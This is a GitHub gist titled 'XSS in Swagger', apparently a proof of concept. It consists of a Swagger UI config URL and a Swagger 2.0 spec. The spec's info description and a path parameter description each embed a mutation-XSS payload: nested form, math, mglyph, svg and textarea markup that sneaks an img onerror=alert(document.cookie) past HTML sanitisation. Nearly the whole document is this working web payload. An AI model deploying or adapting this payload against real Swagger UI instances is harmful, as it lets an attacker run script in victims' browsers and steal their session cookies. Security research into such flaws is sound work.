
@AaronDewes
Last active August 29, 2024 19:12
XSS in Swagger
{
  "url": "https://gist.githubusercontent.com/AaronDewes/c9699fc8341a03d2ff47efae3cfb896d/raw/d27103eeb8fefb0811bcd0ef4c9e7298ad8c357c/xss.yaml",
  "urls": [
    {
      "url": "https://gist.githubusercontent.com/AaronDewes/c9699fc8341a03d2ff47efae3cfb896d/raw/d27103eeb8fefb0811bcd0ef4c9e7298ad8c357c/xss.yaml",
      "name": "XSS"
    }
  ]
}
swagger: '2.0'
info:
  title: XSS Attack
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
  version: production
basePath: /
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified